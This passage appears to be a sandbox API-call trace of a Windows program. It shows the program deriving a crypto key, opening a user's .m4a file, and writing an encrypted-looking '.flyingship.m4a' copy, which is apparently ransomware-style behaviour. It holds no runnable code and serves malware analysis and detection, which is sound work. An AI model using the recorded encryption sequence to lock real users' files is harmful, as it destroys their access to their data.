wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.915] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0186.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.916] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.916] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.916] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.916] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.916] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.916] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.917] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0186.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.917] CryptDestroyHash (hHash=0x90af58) returned 1 [0186.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\kdbywx3dopbmqwfnv.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.918] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.918] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.918] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0186.919] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0186.919] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0186.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0186.920] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4")) returned 0x10 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0186.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0186.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\kdbywx3dopbmqwfnv.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0186.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0186.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0186.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0186.923] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0186.923] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x3928, lpOverlapped=0x0) returned 1 [0186.925] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0186.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3928) returned 0x900658 [0186.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3928) returned 0xbea018 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900658 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.926] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3928) returned 0x900658 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900658 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0186.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.926] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0186.927] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.927] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3928) returned 0x900658 [0186.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0186.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 